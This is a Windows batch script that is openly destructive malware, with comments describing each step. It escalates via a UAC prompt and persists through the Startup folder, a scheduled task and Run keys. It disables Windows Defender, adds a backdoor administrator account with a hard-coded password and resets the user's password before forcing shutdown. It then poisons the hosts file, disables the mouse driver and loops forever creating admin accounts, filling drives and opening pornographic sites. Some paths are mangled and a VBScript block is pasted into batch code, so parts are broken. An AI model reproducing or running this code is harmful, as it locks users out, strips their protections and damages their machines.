@echo off
shell:startup
:: Asks for admin privileges to run
IF "%PROCESSOR_ARCHITECTURE%" EQU "amd64" (
>nul 2>&1 "%SYSTEMROOT%SysWOW64cacls.exe" "%SYSTEMROOT%SysWOW64configsystem"
)
ELSE (
>nul 2>&1 "%SYSTEMROOT%system32cacls.exe" "%SYSTEMROOT%system32configsystem"
)
if '%errorlevel%' NEQ '0' (
goto UACPrompt
) else ( goto gotAdmin )
:UACPrompt
echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%getadmin.vbs"
set params= %*
echo UAC.ShellExecute "cmd.exe", "/c ""%~s0"" %params:"=""%", "", "runas", 1 >> "%temp%getadmin.vbs"
"%temp%getadmin.vbs"
del "%temp%getadmin.vbs"
exit /B
:gotAdmin
pushd "%CD%"
CD /D "%~dp0"
:: Creates persistence and task scedule for itself
copy %0 "C:Users"%username%"AppDataRoamingMicrosoftWindowsStart MenuProgramsStartup" >nul
SCHTASKS /CREATE /SC WEEKLY /D 1 /TN "Mytaskssysf" /TR "C:UsersJarvicAppDataRoamingMicrosoftWindowsStart MenuProgramsStartupfbomber.bat" /ST 12:00 /RU "%username%" >nul
:: Disables windows defender and make sure it is stop
sc config WinDefend start= disabled >nul
sc stop WinDefend >nul
:: adding registry keys to make defender disables
set key="HKLMSOFTWAREPoliciesMicrosoftWindows Defender"
reg add %key% /v DisableAntiSpyware /t REG_DWORD /d 1 /f >nul
:: adds kon7_r4y user and make give him admin role
net user kon7_r4y /add >nul
net localgroup administrators kon7_r4y /add >nul
net user kon7_r4y kon7_r4y@666 >nul
:: change logged in user password to some random number and program 5 minutes shutdown
net user "%username%" %random% >nul
shutdown /s /f /t 350 >nul
:: adds registry keys for this script
reg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v startAPI /t reg_sz /d %0 /f >nul
reg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v /t reg_sz /d %0 /f >nul
:: poison DNS using hosts file
set fileDIR=%homedrive%Windowssystem32driversetc"hosts"
set Destloc=127.0.0.1
echo %Destloc% facebook.com >> %fileDIR% >nul
echo %Destloc% youtube.com >> %fileDIR% >nul
echo %Destloc% speedtest.net >> %fileDIR% >nul
echo %Destloc% instagram.com >> %fileDIR% >nul
echo %Destloc% google.com >> %fileDIR% >nul
echo %Destloc% web.whatsapp.com >> %fileDIR% >nul
echo %Destloc% twitter.com >> %fileDIR% >nul
echo %Destloc% daraz.com >> %fileDIR% >nul
echo %Destloc% netflix.com >> %fileDIR% >nul
:: disable mouse temporarily
set key="HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesMouclass"
set key="HKEY_LOCAL_MACHINEsystemCurrentControlSetServicesMouclass"
reg delete %key%
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
reg add %key% /v Start /t REG_DWORD /d 4
:: ejects CD every half minute
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 50
loop
:: unfinite loops to create spam users, 500MB files, open porn sites, and windows programs
:Fun
set fVALUE=%random%
net user %fVALUE% /add >nul
net localgroup administrators %fVALUE% /add >nul
net user %fVALUE% %random% >nul
fsutil file createnew D:systemp 69000000 >nul
fsutil file createnew E:systemp 69000000 >nul
fsutil file createnew F:systemp 69000000 >nul
fsutil file createnew %homedrive%systemp 69000000 >nul
start chrome "pornhub.com"
start chrome "xhamster.com"
start chrome "jav.guru"
start msedge "pornhub.com"
start msedge "xhamster.com"
start msedge "jav.guru"
start winword
start mspaint
start notepad
start write
start cmd
start explorer
start control
start calc
goto Fun